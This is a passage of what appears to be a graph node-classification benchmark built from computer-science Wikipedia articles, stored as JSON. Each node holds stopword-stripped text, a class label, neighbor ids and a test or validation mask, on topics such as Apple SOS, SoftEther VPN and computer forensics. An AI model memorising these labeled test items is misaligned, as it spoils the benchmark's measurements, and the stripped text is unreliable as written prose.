    "text": "Poul-Henning_Kamp:poul-henning kamp poul-henning kamp born 1966 danish computer software developer known work various projects currently resides slagelse denmark poul-henning kamp committing freebsd project duration responsible widely used md5crypt implementation md5 password hash algorithm vast quantity systems code including freebsd geom storage layer gbde cryptographic storage transform part ufs2 file system implementation freebsd jails malloc library ntp timecounters code lead architect developer open source varnish cache project http accelerator 2006 kamp dispute electronics manufacturer d-link claimed committing ntp vandalism embedding ip address ntp servers routers dispute resolved 27 april 2006 post poul-henning freebsd mailing lists responsible popularization term bike shed discussion derived term bikeshedding describe parkinson law triviality open source projects amount discussion subject receives inversely proportional importance poul-henning kamp known preference beerware license gnu general public license gpl poul-henning kamp made various anti-semitic comments blaming world jews collectively responsible actions israel may 8 2019 tweeted thought anti-semitism *unfounded* hatred jews hate something awful like implement apartheid anti-semitism perfectly justified critique people particular know better clarifying blog post later wrote readily admit probably skilled use twitter stand point kamp went say detests cowardice appaled sic arms atrocities uns human rights done name religion poul-henning kamp published substantial number articles years publications like communications acm acm queue mostly topics computing time keeping selection publications",
    "neighbors": [
      10761,
      2061,
      9743,
      8725,
      4636,
      1071,
      1080,
      5177,
      9784,
      64,
      3651,
      7748,
      8266,
      5710,
      7249,
      607,
      9320,
      10344,
      8816,
      9844,
      633,
      8316,
      9343,
      2180,
      4745,
      2212,
      684,
      3248,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      9452,
      11506,
      1273,
      7425,
      1801,
      274,
      1316,
      6438,
      10535,
      4908,
      302,
      1839,
      9009,
      11573,
      3382,
      7479,
      850,
      6491,
      7521,
      1891,
      873,
      7027,
      2421,
      2424,
      7552,
      5506,
      1927,
      9616,
      11158,
      9625,
      1946,
      5534,
      11698,
      1465,
      3006,
      9151,
      9153,
      6617,
      10202,
      3551,
      998,
      4073,
      2545,
      3058,
      9201
    ],
    "mask": "Test"
  },
  {
    "node_id": 9307,
    "label": 3,
    "text": "Pico-ITXe:pico-itxe pico-itxe pc pico-itx motherboard specification created via technologies sff-sig announced via technologies october 29 2008 released december 2008 pico-itxe specifications call board half area nano-itx 12 layers deep processor via c7 uses via nanobga2 technology uses ddr2 667/533 so-dimm memory support 2gb video supplied via chrome9 hc3 gpu built-in mpeg-2 4 wmv9 vc1 decoding acceleration bios 4 8 mbit award bios first motherboard produced specification called epia-p710 released december 2008 12 layers deep operating temperature range 0°c 50°c operating humidity level relative non-condensing 0 95 uses 1 ghz via c7-m processor via vx800 chip set rohs compliant onboard vga video-out gigabit ethernet supplied via vt6122 requires connector board hd 5.1 channel audio provided via vt1708b chip following standard i/o connections four i/o expansion boards stacked upon using sumit interface",
    "neighbors": [
      10337,
      2500,
      455,
      7113,
      1515,
      3883,
      7151,
      10095,
      2161,
      2803,
      8730,
      10715,
      3037
    ],
    "mask": "Test"
  },
  {
    "node_id": 9308,
    "label": 2,
    "text": "Apple_SOS:apple sos sophisticated operating system sos primary operating system developed apple iii computer sos developed apple computer inc. released october 1980 sos single-tasking single-user operating system makes resources apple iii available form menu-driven utility program well programming application programming interface api single program loaded boot time called interpreter loaded interpreter use sos api make requests system sos api divided four main areas apple iii system utilities program shipped apple iii computer provides user interface operating system system configuration file management system utilities program menu-driven performs tasks three categories sos two types devices communicates via device drivers character devices block devices examples sos character devices keyboards serial ports disk drives typical block devices block devices read write one 512-byte blocks time character devices read write single characters time powered apple iii runs system diagnostics reads block number zero built-in diskette drive memory executes sos-formatted diskettes place loader program block zero loader program searches loads executes file named sos.kernel kernel api operating system kernel turn searches loads file named sos.interp interpreter program run sos.driver set device drivers use files loaded control passed sos.interp program apple prodos uses file system sos disk formatted prodos prodos loader sos loader written blocks zero one respectively prodos loader includes code execute apple iii chainload sos loader block one sos prodos co-exist volume software adtpro makes use store apple ii apple iii versions program disk bootable systems 1985 steve wozniak critical apple iii hardware flaws called sos finest operating system microcomputer ever regardless sos advantages system backward-compatible dos 3.2 dos 3.3 apple ii software used time though apple iii designed mostly backward-compatible apple ii plus hardware users must boot apple dos separate disk utilize apple ii series software thus losing advantages sos many average computer users also ready 1980 operating system capabilities flexible configuration options sos offers especially combined apple iii bad reputation due poor engineering high retail price nearly",
    "neighbors": [
      2179,
      9732,
      10755,
      6023,
      6539,
      7307,
      4114,
      6675,
      11171,
      11430,
      3241,
      6186,
      5293,
      7983,
      3248,
      8114,
      8754,
      7991,
      9784,
      2363,
      7483,
      2365,
      2366,
      8767,
      576,
      11257,
      10052,
      11513,
      8774,
      3286,
      1623,
      7133,
      3167,
      3681,
      5093,
      6377,
      3948,
      5363,
      5619,
      8441
    ],
    "mask": "Test"
  },
  {
    "node_id": 9309,
    "label": 3,
    "text": "Elbrus_2000:elbrus 2000 elbrus 2000 e2k russian 512-bit wide vliw microprocessor developed moscow center sparc technologies mcst fabricated tsmc supports two instruction set architecture isa thanks unique architecture elbrus 2000 execute 20 instructions per clock even modest clock speed compete much faster clocked superscalar microprocessors running native vliw mode security reasons elbrus 2000 architecture implements dynamic data type-checking execution order prevent unauthorized access pointer additional type information verified associated data accessed",
    "neighbors": [
      6659,
      7941,
      1798,
      7687,
      1425,
      6815,
      10145,
      4386,
      6818,
      1702,
      6957,
      823,
      2490,
      11580,
      7234,
      2503,
      4039,
      2523,
      5358,
      1776,
      499,
      1399,
      3071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9310,
    "label": 3,
    "text": "Auf_Wiedersehen_Monty:auf wiedersehen monty auf wiedersehen monty german goodbye monty computer game zx spectrum commodore 64 amstrad cpc msx commodore 16 released 1987 fourth monty series following monty innocent monty run successful original written peter harrap shaun hollingworth music rob hubbard ben daglish player controls monty travels around europe collecting money order buy greek island montos safely retire gameplay style flick-screen platform game similar many games 1980s technician ted jet set willy screens representing eiffel tower pyrenees bear relation real-life counterparts typical platform game screens auf wiedersehen monty contains many interesting features peculiarities player discover examples include suddenly attacked bull head spain collecting red cape presumably reference bullfighting car dropped one two places entering screen representing düsseldorf west germany chef hat found sweden reference swedish chef muppets fame also two rooms representing sweden subtitled bjorn borg record luxembourg collected makes monty breakdance game title music may reference radio luxembourg possible get areas game quickly flying airport using air tickets collected throughout game parts game reached manner well money miscellaneous objects collect game points important need certain number points get montos often particular country monty visiting berets france bottles wine glass beer west germany cause monty briefly become drunk control become slightly erratic leading reversal controls repeated jumping monty climbing ladders drainpipes encounters moley christmas released later year monty mole game called impossamole released 1990 took different form previous games console-style arcade game",
    "neighbors": [
      10931,
      9006,
      1527
    ],
    "mask": "Test"
  },
  {
    "node_id": 9311,
    "label": 8,
    "text": "Wholesale_Applications_Community:wholesale applications community wholesale applications community wac organisation set create unified open platform allow mobile software developers easily write applications usable variety devices operating systems networks least 48 companies members organization wac organisation came end gsma announcing july 17 2012 reached agreement integrate wac major programs initiatives gsma additionally apigee acquired technology assets wac wac preceded omtp completed acquisition joint innovation lab 1 october 2010 accelerating commercial launch wac-enabled application stores put position fully operational commercially running end 2010 wholesale application community application development platform based standard technologies html javascript cascading style sheets css specifically platform builds work former open mobile terminal platform ltd. bondi project joint innovation lab jil device apis gsm association oneapi program utilizing web-based technologies rather relying developers write native applications specific devices wac alliance believes spur development applications across much wider range devices group also aims make certain telecoms apis available developers operator billing wac standards development organisation sdo used w3c standard technologies platform particular used w3c widget packaging format specification web apps also furthered use javascript device apis originated omtp bondi project bondi developed defunct open mobile terminals platform omtp jil joint venture china mobile softbank verizon wireless vodafone focused promoting use web based technologies mobile application development jil compliant handsets include sgh-i8320 samsung vodafone 360 h1 27 july 2010 wac announced would join forces jil completed acquisition 1 october 2010 meant developers currently creating jil applications continue working existing jil specification tools software libraries applications deployed jil based devices immediately publication wac specification developers also clear path deploy applications wider range devices supporting wac specification 2011 one question whether large group operators able respond changing market conditions particularly wake influence exerted apple google however vidhya gholkar wac developer relations lead commented mobile 2.0 september 20 2010 wac competing apple similar companies focus making apps available much greater audience requires adherence core set web technologies ability distribute base larger served single device os",
    "neighbors": [
      7936,
      11588,
      3462,
      9063,
      3152,
      8923
    ],
    "mask": "None"
  },
  {
    "node_id": 9312,
    "label": 3,
    "text": "Macintosh_LC_500_series:macintosh lc 500 series macintosh lc 500 series series personal computers part apple computer macintosh lc family macintosh computers apple mid-1990s mainstream education-market macintosh featuring all-in-one desktop design built-in 14 crt display cd-rom drive stereo speakers designed successor compact macintosh family computers case similar recently introduced macintosh color classic considerably larger heavier due larger screen bulging midsection house larger electronics 500 series included four main models 520 550 575 580 520 550 using different speeds motorola 68030 575 580 sharing 33mhz motorola 68lc040 processor differing rest hardware computers also sold consumer market department stores macintosh performa brand similar model numbers lc models particular became popular schools small footprint lack cable clutter durability macintosh tv branded lc uses lc 520 case black instead platinum logic board similar lc 550 compact color classic series shares many components able swap logic boards early 500 series machines macintosh lc 520 introduced june 1993 case design larger compact macintosh models precede due large part significantly larger screen lc 520 got start design project codenamed mongo following success color classic apple industrial design group idg began exploring adaptation color classic design language dubbed espresso larger display version would also include cd-rom drive however idg hated design much permanently shelved final concept 1992 apple ceo john sculley demanded large screen all-in-one design fill market strategy less 6 months idg objections apple engineering team retrieved shelved design promptly put production idg universally detested design immediately began re-design project would become power macintosh 5200 lc series less two years later logic board 520 broadly macintosh lc iii motorola 68030 cpu optional motorola 68882 fpu new york times review lc 520 generally positive columnist peter lewis noting 1,599 price point perhaps best value entire macintosh product line ... would difficult put together windows-based pc features price windows computers usually much less expensive macs lewis also noted unit 40-pound weight would make difficult carry home night -- attribute apple previously marketed feature compact macintosh models 1980s macweek wrote timing lc 520 release coincided purchasing timelines schools decision market computer exclusively education market part strategic shift move lc brand away retail market 520 discontinued february 1994 replaced faster otherwise essentially unchanged macintosh lc 550 new 68lc040-equipped macintosh lc 575 apple sold upgrade kits lc 520 brought specifications lc 550 575 initially sold japan canada u.s. educational institutions computer discontinued february 1994 featured caddy-loaded cd-rom drive introduced june 28 1993 macintosh lc 550 replaced lc 520 february 1994 performa variants introduced earlier 550 october 1993 560 january 1994 remained available year longer april 1996 main difference 550 520 faster 68030 cpu clocked 33 mhz instead 25 mhz bus speed also increasing 25 33 mhz like 520 optical drive use loading tray instead utilized caddy disk first inserted caddy loaded drive logic board 550 essentially one used macintosh color classic ii upgrade original color classic available united states apple also offered upgrade package 520 lc 575 logic board two performa variants introduced varying software bundle included 550 included consumer applications performa 560 called money edition owing partnership apple money magazine addition consumer education software also included dozen business software applications lc 575 discontinued favor either lc 580 lower end powerpc-based power macintosh 5200 lc models higher end introduced october 18 1993 introduced january 15 1994 introduced february 2 1994 macintosh lc 575 available 1994 1996 retains all-in-one case lc 520/550 uses lc 475 motherboard motorola 68lc040 cpu speed 33 mhz instead 25 mhz tray-loading optical drive also included high density floppy disk drive cpu clock sometimes given 66 mhz since clock signal frequency however processor runs 33 mhz lc 575 also introduced comm slot included later lc models well may 1994 set performa variants introduced performa 575 577 578 machines identical except amount ram hdd size software packages included performa variants include clarisworks 2.0 quicken 4.0 grolier encyclopedia 1993 time magazine almanac ease educational titles david pogue described machine enthusiastically received mac fans appreciated crisp color screens speedy performance rich sound upgradability power macs line lc variant succeeded macintosh lc 580 performa variants sold 580 discontinued lc 580 performa variants available outside united states model favorite motherboard donor wishing upgrade color classic faster class processor apple also offered upgrade path form powerpc macintosh processor upgrade introduced february 1994 introduced may 1994 macintosh lc 580 sold april 1995 may 1996 like lc 575 built around motorola 68lc040 processor running 33 mhz however instead using sized scsi-only logic boards based lc 475/quadra 605 like lc 575 580 uses larger logic board performa 630 meant changes leading lower prices also lower performance notably hard drives 580 ide drives instead scsi drives also video ram longer mounted simm used 1 mb 4 mb main ram soldered motherboard lastly trinitron display 575 replaced cheaper shadow mask screen causing slight change plastic case surrounding crt one benefit change ability accommodate video capture tv tuner cards designed performa 630 allowed lc 580 users watch record video essentially performing function television well computer lc 580 lc 630 dos compatible introduced time last macintosh desktop systems built around motorola 68000-series processor replacement power macintosh 5200 lc features powerpc processor apple also offered upgrade path 580 form powerpc macintosh processor upgrade 580 also upgraded following logic boards 5200 lc 6200 5260 5300 6300 5400 6400 5500 6500 introduced april 3 1995 introduced april 13 1995 introduced may 1 1995 central processing unit motorola 68lc040 33 mhz 8 kb l1 cache memory 8 mb expandable 52 mb 2 72-pin simms 1 mb 4 mb ram soldered mainboard used video ram storage hard drive 250 mb 500 mb ide floppy drive 1.44 mb superdrive read 400 kb 800 kb diskettes well cd-rom 4x applecd unit expansion 1 lc pds 1 comm slot display 14″ color crt supports 32,768 colors",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 9313,
    "label": 4,
    "text": "Usability_of_web_authentication_systems:usability web authentication systems usability web authentication systems refers efficiency user acceptance online authentication systems examples web authentication systems passwords federated identity systems e.g google oauth 2.0 facebook connect mozilla persona email-based single sign-on sso systems e.g saw hatchet qr code-based systems e.g snap2pass webticket system used authenticate user identity web even though usability web authentication systems key consideration selecting system web authentication systems passwords subjected formal usability studies analysis web authentication system needs usable possible whilst compromising security needs ensure system needs restrict access malicious users whilst allowing access authorised users authentication system sufficient security malicious users could easily gain access system hand authentication system complicated restrictive authorised user would able want use strong security achievable system even secure authentication system undermined users system often referred weak links computer security users tend inadvertently increase decrease security system system usable security could suffer users try minimize effort required provide input authentication writing passwords paper usable system could prevent happening users likely oblige authentication requests systems important e.g online banking opposed less important systems e.g forum user visits infrequently mechanisms might ignored users accept security measures certain point becoming annoyed complicated authentication mechanisms important factor usability web authentication system thus convenience factor user around preferred web authentication system web applications password despite poor usability several security concerns widely used system usually contains mechanisms intended increase security e.g requiring users high entropy passwords lead password systems less usable inadvertently less secure users find high entropy passwords harder remember application creators need make paradigm shift develop usable authentication systems take user ’ needs account replacing ubiquitous password based systems usable possibly secure systems could lead major benefits owners application users measure usability web authentication system one use usability–deployability–security uds framework standard metric system usability scale uds framework looks three broad categories namely usability deployability security web authentication system rates tested system either offering offering specific benefit linked one categories authentication system classified either offering offering specific benefit within categories usability deployability security measuring usability web authentication systems allow formal evaluation web authentication system determine ranking system relative others lot research regarding web authentication system currently done tends focus security usability future research evaluated formally usability using comparable metric technique enable comparison various authentication systems well determining whether authentication system meets minimum usability benchmark found security experts tend focus security less usability aspects web authentication systems problematic needs balance security system ease-of-use study conducted 2015 found users tend prefer single sign-on like provided google facebook based systems users preferred systems found fast convenient use single sign-on based systems resulted substantial improvements usability security sso reduces need users remember many usernames passwords well time needed authenticate thereby improving usability system usability become important applications move online require robust reliable authentication systems usable secure use brainwaves authentication systems proposed possible way achieve however research usability studies required",
    "neighbors": [
      3941,
      2558,
      7368,
      6761,
      5433,
      7994,
      5373,
      6750,
      10207
    ],
    "mask": "Test"
  },
  {
    "node_id": 9314,
    "label": 7,
    "text": "Dew_computing:dew computing dew computing information technology paradigm combines core concept cloud computing capabilities end devices personal computers mobile phones etc. used enhance experience end user comparison using cloud computing dew computing attempts solve major problems related cloud computing technology reliance internet access dropbox example dew computing paradigm provides access files folders cloud addition keeping copies local devices allows user access files times without internet connection connection established files folders synchronized back cloud server term dew computing used information technology first appeared 2015 literature since become field cloud-dew architecture proposed possible solution offline data accessibility problem first scope included web applications broader applications later proposed dew computing model derived original concept cloud computing models also emerged cloud computing including fog computing edge computing dew computing others proponents claim novel models dew computing provide better experiences users cloud computing provides universal access scalability however resources far user control occasionally causes problems classic cloud computing paradigm internet connection servers lost user unable access data dew computing aims solve problem information technology paradigm dew computing seeks use capabilities personal computers along cloud services reliable manner key features dew computing independence collaboration independence means local device must able provide service without continuous connection internet collaboration means application must able connect cloud service synchronize data appropriate use word dew reflects natural phenomena clouds far ground fog closer ground dew ground analogically cloud computing remote service fog computing beside user dew computing user end establish cloud-dew architecture pc dew virtual machine dvm needed dvm isolated environment executing dew server local pc consists least three components dew server ds data analytics server das artificial intelligence dew aid dew computing categories classified based application field dew computing faces number technical challenges including issues related power management processor utility data storage factors impacting use dew computing viability operation system network model communication model programming principles dew recommended engine local dew network personal high productivity database security behaviors browser",
    "neighbors": [
      4194,
      4964,
      3366,
      4623,
      7248,
      2901,
      7802,
      119,
      9112,
      154,
      8413
    ],
    "mask": "Test"
  },
  {
    "node_id": 9315,
    "label": 9,
    "text": "Peter_Naur:peter naur peter naur 25 october 1928 – 3 january 2016 danish computer science pioneer turing award winner last name n bnf notation backus–naur form used description syntax programming languages contributed creation algol 60 programming language naur began career astronomer received phd degree 1957 encounter computers led change profession 1959 1969 employed regnecentralen danish computing company time giving lectures niels bohr institute technical university denmark 1969 1998 naur professor computer science university copenhagen main areas inquiry design structure performance computer programs algorithms areas software engineering software architecture also pioneered naur book computing human activity 1992 collection contributions computer science rejected formalist school programming views programming branch mathematics like associated backus–naur form attributed donald knuth said would prefer called backus normal form naur married computer scientist christiane floyd naur disliked term computer science suggested called datalogy data science former term adopted denmark sweden datalogi latter term used data analysis including statistics databases since middle 1960s computer science practiced denmark peter naur term datalogy science data processes starting regnecentralen university copenhagen copenhagen tradition computer science developed special characteristics means close connection applications fields knowledge tradition least visible area education comprehensive project activity integral part curriculum thus presenting theory aspect realistic solutions known primarily actual experience peter naur early recognized particular educational challenges presented computer science innovations shown quality vitality also universities close connection computer science training formed copenhagen university view computer science characterized peter naur research later years quite outspoken pursuit science whole naur possibly identified empiricist school tells one shall seek deeper connections things manifest world keep observable facts attacked certain strands philosophy psychology viewpoint also developing theory human thinking called synapse-state theory mental life naur 2005 acm a.m. turing award work defining algol 60 programming language particular role editor influential report algorithmic language algol 60 pioneering use bnf recognized naur dane turing award naur died 3 january 2016 short illness numbers refer published bibliography naur published large number articles chapters astronomy computer science issues society classical music psychology education",
    "neighbors": [
      512,
      7048,
      11020,
      4877,
      1947,
      10668,
      1841,
      2482,
      1976,
      4799,
      4800,
      10049,
      4930,
      10560,
      70,
      8262,
      3529,
      1610,
      1611,
      1883,
      7775,
      4201,
      11242,
      2283,
      2798,
      1783,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9316,
    "label": 1,
    "text": "Data_pack:data pack data pack fact pack pre-made database fed software software agents internet bots chatterbots teach information facts later look words data pack used feed minor updates system common data packs may include abbreviations acronyms dictionaries lexicons technical data country codes rfcs filename extensions tcp udp port numbers country calling codes data packs may come formats csv sql easily parsed imported database management system database may consist key-value pair like association list data packs commonly used within gaming industry provide minor updates within games user downloads update game downloading loads data packs contain updates game minor bug fixes additional content example data pack used update game found references data pack datapack definition similar data packet contains loads information data stores within pack data compressed reduce file size certain programs read data pack therefore data packed vital know whether receiving program able unpack data example data packs able effective deliver information found reference page refer word data pack come many forms mobile data pack mobile data pack refers add-on enable boost amount data use mobile phone rate use data also monitored know much data left mobile data service provides similar service wi-fi allows connect internet purpose data pack increase amount data mobile access example mobile data pack found references",
    "neighbors": [
      4576,
      6208,
      10413,
      6993,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 9317,
    "label": 4,
    "text": "Elias_Levy:elias levy elias levy also known aleph one computer scientist moderator bugtraq full disclosure vulnerability mailing list may 14 1996 october 15 2001 cto co-founder computer security company securityfocus acquired symantec august 6 2002 also known author article smashing stack fun profit published 1996 phrack magazine issue 49 first high-quality public step-by-step introduction stack buffer overflow vulnerabilities exploitation sale securityfocus symantec august 2002 levy accused many selling compromising high principles bugtraq list full-disclosure mailing list founded part protest sale",
    "neighbors": [
      9569,
      1474,
      6754,
      8368,
      4562,
      4117
    ],
    "mask": "None"
  },
  {
    "node_id": 9318,
    "label": 4,
    "text": "SoftEther_VPN:softether vpn softether vpn free open-source cross-platform multi-protocol vpn client vpn server software developed part daiyuu nobori master thesis research university tsukuba vpn protocols ssl vpn l2tp/ipsec openvpn microsoft secure socket tunneling protocol provided single vpn server released using gplv2 license january 4 2014 license switched apache license 2.0 january 21 2019 softether vpn supports nat traversal making useful run vpn servers computers behind residential gateways facility routers firewalls firewalls performing deep packet inspection unable detect softether vpn transport packets vpn tunnel https used camouflage connection softether vpn optimizes performance using full ethernet frame utilization reducing memory copy operations parallel transmission clustering together reduce latency normally associated vpn connections increasing throughput softether vpn server vpn bridge run windows linux os x os x 10.8 freebsd solaris operating systems softether vpn client runs windows linux macos softether vpn server serves softether vpn protocol also serves openvpn microsoft secure socket tunneling protocol sstp ssl vpn etherip l2tpv3 ipsec serves mobile devices running ios android windows phone via l2tp/ipsec vpn clients endpoints supporting vpn protocols may also used includes many routers cisco juniper linksys dd-wrt asus others softether vpn server implements vpn server function listens accepts connections vpn client vpn bridge several vpn protocols vpn server several virtual hubs virtual layer-3 switches virtual hub full layer-2 ethernet packet-switching functions like physical ethernet switch additionally virtual hub configured define ip packet filter entries filter packets virtual hub virtual layer-3 switch layer-3 ip static routing functions like physical router vpn server local bridges local bridge layer-2 packet-switching fabric physical ethernet network-adapter virtual hub administrator defines local bridge virtual hub existing corporate network build remote-access vpn server site-to-site vpn server softether vpn client vpn client program virtualized function ethernet network adapter computer installed softether vpn client establish vpn connection vpn server since vpn server support multiple vpn protocols l2tp/ipsec ms-sstp vpn vpn users required install softether vpn client client computers user uses l2tp/ipsec ms-sstp vpn connect vpn server built-in vpn client programs operating system used establish vpn vpn server however softether vpn client advanced functions e.g detailed vpn communication settings os built-in vpn clients exploit full performance softether vpn server recommended install softether vpn client client computer softether vpn bridge vpn program building site-to-site vpn build site-to-site vpn network system administrator install softether vpn server central site install softether vpn bridge one remote sites vpn bridge connects central vpn server cascade connection cascade connection similar virtualization uplink connection cross-cable connection two physical ethernet switches gui tool administrative tool softether vpn server softether vpn bridge program runs windows linux wine system administrator installs gui tool laptop pc makes connect remote vpn server vpn bridge administration connection made ssl session management commands transported rpc ssl vpncmd cui administrative tool softether vpn server client bridge program runs consoles every supported operating systems user unable use windows linux wine user alternatively use vpncmd manage vpn programs vpncmd also useful execute batch operation creating many users virtual hub creating many virtual hubs vpn server parts architecture softether vpn different typical traditional ipsec-based vpn systems virtual hub software-emulated virtual ethernet switch learns maintains forwarding-database table inside traditional physical ethernet switches implement function hardware softether vpn implements function software vpn server several virtual hubs virtual hub isolated virtual hub performs packet-switching concurrently connected vpn sessions realize communication vpn clients vpn bridges several virtual hubs single instance vpn server virtual hubs isolated security different administrator delegated privilege correspondent virtual hub administrator virtual hub define user-objects acls limited delegated virtual hub virtual network adapter software-emulated virtual ethernet adapter vpn client create several virtual network adapters client computer vpn user establish vpn session virtual network adapter destination virtual hub remote vpn server vpn session established vpn user communicate remote vpn network virtual network adapter since virtual network adapter works physical one applications operating system components used without modification virtual layer-3 switch software-emulated virtual ip router several virtual layer-3 switches created single vpn server instance virtual layer-3 switch virtual ip interfaces connected virtual hubs also several static routing table entries virtual layer-3 switch useful make large-scale site-to-site vpn network although easy way make site-to-site vpn network build layer-2 bridging based vpn number computers huge number broadcasting packets increase load inter-site links prevent scaling problem vpn administrator isolates ip networks virtual layer-3 switch administrator define cascade connection local remote virtual hubs cascade connection established originally-isolated two ethernet segments combined single ethernet segment therefore cascade connection function used build site-to-site layer-2 ethernet bridging since virtual hubs virtual network adapters software-emulated virtual ethernet devices ethernet packets virtual devices communicate physical ethernet devices therefore bridge virtual physical necessary build remote-access vpn site-to-site vpn make bridge local bridge function exchanges ethernet packets virtual hub physical ethernet network adapter combine isolated ethernet segments single ethernet segment defining local bridge softether vpn server vpn client connect vpn server communicate existing ethernet devices e.g servers network equipment local bridge called remote-access vpn network administrator sets remote-site vpn bridge defines two local bridges vpn server vpn bridge defines cascade connection vpn server vpn bridge remote two ethernet segments connected directly layer-2 ethernet level called site-to-site vpn one key features softether vpn transparency firewalls proxy servers nats network address translators softether vpn supports ssl-vpn nat traversal softether vpn uses https protocol order establish vpn tunnel https http ssl protocol uses tcp/ip port 443 may vary destination user chooses ssl-vpn protocol vpn client vpn server softether vpn server vpn client use parallel transmission mechanism improve throughput ssl-vpn tunnel user set number concurrent parallel transmission channels 1 32 environment slow delaying network performance tuning result faster throughput function enabled logical vpn session consist several tcp https connections packets added one appropriate tcp connections calculations optimizing modules packet losses detected tcp connection logical vpn session new packet use another healthy vpn connection fast-switching optimization determine processing tcp connection enables high throughput traditional vpn systems require user ask firewall administrator company open endpoint tcp udp port firewall nat border company internet order reduce necessity open endpoint firewall softether vpn server nat traversal function nat traversal enabled default long enabled softether vpn client computers connect vpn server behind firewall nat special settings firewall nat necessary very-restricted networks permit pass icmp dns packets network tcp udp filtered icmp dns permitted order make possible establish softether vpn client-server session via very-restricted network softether vpn vpn icmp vpn dns function function powerful penetrate restricted firewall vpn packets encapsulated icmp dns packets transmit firewall receiver-side endpoint extracts inner packet capsuled packet useful exploiting public wi-fi public wi-fi pass icmp dns packets filter tcp udp packets vpn server installed home office advance going outdoors enjoy protocol-free network communication using restricted network vpn gate plugin softether vpn allows users connect free vpn servers run volunteers use softether host vpn servers volunteers use personal computers servers vpn gate sponsored university tsukuba",
    "neighbors": [
      2050,
      10631,
      10889,
      4746,
      8331,
      9722,
      8211,
      5402,
      11162,
      3742,
      9764,
      8998,
      4268,
      7983,
      10417,
      7859,
      2228,
      823,
      3770,
      8640,
      3777,
      9281,
      2884,
      5959,
      8265,
      11468,
      3792,
      7376,
      11606,
      2136,
      9048,
      6490,
      8283,
      5084,
      6364,
      10210,
      7139,
      8039,
      11248,
      5749,
      3322,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9319,
    "label": 4,
    "text": "Computer_forensics:computer forensics computer forensics also known computer forensic science branch digital forensic science pertaining evidence found computers digital storage media goal computer forensics examine digital media forensically sound manner aim identifying preserving recovering analyzing presenting facts opinions digital information although often associated investigation wide variety computer crime computer forensics may also used civil proceedings discipline involves similar techniques principles data recovery additional guidelines practices designed create legal audit trail evidence computer forensics investigations usually subjected guidelines practices digital evidence used number high-profile cases becoming widely accepted reliable within u.s. european court systems early 1980s personal computers became accessible consumers leading increased use criminal activity example help commit fraud time several new computer crimes recognized cracking discipline computer forensics emerged time method recover investigate digital evidence use court since computer crime computer related crime grown jumped 67 2002 2003 today used investigate wide variety crime including child pornography fraud espionage cyberstalking murder rape discipline also features civil proceedings form information gathering example electronic discovery forensic techniques expert knowledge used explain current state digital artifact computer system storage medium e.g hard disk cd-rom electronic document e.g email message jpeg image scope forensic analysis vary simple information retrieval reconstructing series events 2002 book computer forensics authors kruse heiser define computer forensics involving preservation identification extraction documentation interpretation computer data go describe discipline art science indicating forensic methodology backed flexibility extensive domain knowledge however several methods used extract evidence given computer strategies used law enforcement fairly rigid lack flexibility found civilian world court computer forensic evidence subject usual requirements digital evidence requires information authentic reliably obtained admissible different countries specific guidelines practices evidence recovery united kingdom examiners often follow association chief police officers guidelines help ensure authenticity integrity evidence voluntary guidelines widely accepted british courts computer forensics used evidence criminal law since mid-1980s notable examples include computer forensic investigations usually follow standard digital forensic process phases acquisition examination analysis reporting investigations performed static data i.e acquired images rather live systems change early forensic practices lack specialist tools led investigators commonly working live data number techniques used computer forensics investigations much written many techniques used law enforcement particular seizing evidence machine still active information stored solely ram recovered powering may lost one application live analysis recover ram data example using microsoft cofee tool windd windowsscope prior removing exhibit captureguard gateway bypasses windows login locked computers allowing analysis acquisition physical memory locked computer ram analyzed prior content power loss electrical charge stored memory cells takes time dissipate effect exploited cold boot attack length time data recoverable increased low temperatures higher cell voltages holding unpowered ram −60 °c helps preserve residual data order magnitude improving chances successful recovery however impractical field examination tools needed extract volatile data however require computer forensic lab maintain legitimate chain evidence facilitate work machine necessary law enforcement applies techniques move live running desktop computer include mouse jiggler moves mouse rapidly small movements prevents computer going sleep accidentally usually uninterruptible power supply ups provides power transit however one easiest ways capture data actually saving ram data disk various file systems journaling features ntfs reiserfs keep large portion ram data main storage media operation page files reassembled reconstruct ram time number open source commercial tools exist computer forensics investigation typical forensic analysis includes manual review material media reviewing windows registry suspect information discovering cracking passwords keyword searches topics related crime extracting e-mail pictures review several computer forensics certifications available isfce certified computer examiner digital forensics investigation professional dfip iacrb certified computer forensics examiner top vendor independent certification especially within eu considered ccfp certified cyber forensics professional others worth mention usa apac iacis international association computer investigative specialists offers certified computer forensic examiner cfce program isfcs international society forensic computer examiners® offers certified computer examiner cce program asian school cyber laws offers international level certifications digital evidence analysis digital forensic investigation courses available online class room mode many commercial based forensic software companies also offering proprietary certifications products example guidance software offering ence certification tool encase accessdata offering ace certification tool ftk passmark software offering oce certification tool osforensics x-ways software technology offering x-pert certification software x-ways forensics",
    "neighbors": [
      8320,
      3330,
      6916,
      2437,
      8580,
      10372,
      7560,
      2953,
      778,
      2193,
      2194,
      5010,
      4500,
      1941,
      8469,
      9109,
      3099,
      6684,
      9630,
      1312,
      6177,
      7458,
      7968,
      5284,
      3109,
      9762,
      6443,
      3629,
      11182,
      7983,
      9392,
      10290,
      5427,
      4789,
      4408,
      7160,
      1978,
      8635,
      9145,
      2494,
      830,
      3393,
      11330,
      1475,
      3653,
      8389,
      7369,
      9289,
      6475,
      10189,
      1873,
      4049,
      2643,
      6494,
      9950,
      4834,
